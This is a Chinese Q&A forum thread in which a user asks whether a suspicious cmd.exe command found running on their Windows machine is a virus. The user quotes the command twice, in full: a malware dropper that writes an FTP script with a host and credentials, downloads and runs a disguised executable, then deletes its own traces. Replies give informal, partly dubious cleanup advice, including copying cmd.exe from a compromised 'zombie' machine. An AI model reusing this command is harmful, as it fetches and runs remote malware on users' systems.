UC知道无敌的cmd.exe病毒... 高手先准备下再进来...
来源:百度知道 编辑:UC知道 时间:2024/06/01 18:30:56
进程路径:C:\WINNT\System32\WBEM\WinMgmt.exe
文件路径:C:\WINNT\system32\cmd.exe
命令行:/c echo open bbbiapy.cn>%WINDIR%\WindowsGard&& echo 46134730>>%WINDIR%\WindowsGard&& echo 2234>>%WINDIR%\WindowsGard&& echo binary>>%WINDIR%\WindowsGard&& echo get imgeditadmnin.exe %WINDIR%\fireFoxUpdater.exe>>%WINDIR%\WindowsGard&& echo bye>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\fireFoxUpdater.exe>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
没修改过...
文件路径:C:\WINNT\system32\cmd.exe
命令行:/c echo open bbbiapy.cn>%WINDIR%\WindowsGard&& echo 46134730>>%WINDIR%\WindowsGard&& echo 2234>>%WINDIR%\WindowsGard&& echo binary>>%WINDIR%\WindowsGard&& echo get imgeditadmnin.exe %WINDIR%\fireFoxUpdater.exe>>%WINDIR%\WindowsGard&& echo bye>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\fireFoxUpdater.exe>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
没修改过...
cmd可不是病毒啊
应该是被病毒程序调用了。。。。
用冰刀找着个钩子
winF.bat
删了它
应该就行了
指向文件很多丫~~不过幸运的是没有系统程序和服务,所以可以尽可能的从源种找到地址把和病毒挂钩的程序删除掉吧。至于CMD的话,找一个安全的肉鸡托一个到注册表里面就可以了,或者找个系统盘提取下CMD和它的扩展就可以咯!!
这是病毒的代码么?